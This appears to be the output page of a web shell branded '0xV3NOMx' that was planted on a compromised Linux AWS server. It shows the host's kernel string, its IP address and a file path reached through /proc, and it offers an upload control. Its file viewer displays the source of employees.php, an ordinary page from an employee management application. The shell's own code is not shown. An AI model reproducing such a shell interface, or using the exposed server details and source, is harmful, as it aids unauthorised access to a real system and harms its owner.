0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.218.231.116


Current Path : /proc/thread-self/root/var/www/html/oums/
Upload File :
Current File : //proc/thread-self/root/var/www/html/oums/employees.php

<!DOCTYPE html>
<html>

<head>
    <link rel="stylesheet" type="text/css" media="screen" href="assets/datepicker/grid/js/themes/redmond/jquery-ui.custom.css">

    <link rel="stylesheet" type="text/css" media="screen" href="assets/datepicker/grid/js/jqgrid/css/ui.jqgrid.css">

    <script src="assets/datepicker/grid/js/jquery.min.js" type="text/javascript"></script>
    <script src="assets/datepicker/grid/js/themes/jquery-ui.custom.min.js" type="text/javascript"></script>
    <script src="js/employees.js" type="text/javascript"></script>
</head>

<body onLoad="load_page();">
    <?php include("header.php"); ?>
    <div id="page-middle">
        <div class="page-container panel panel-primary">
            <div class="page-container-head panel-heading">
                <div id="page-container-titl" class="pull-left"></div>
                <div id="page-container-link" class="pull-right"></div>
                <div class="clearfix"></div>
            </div>

            <div id="page-container-body" class="panel-body"></div>
        </div>
    </div>
</body>

</html>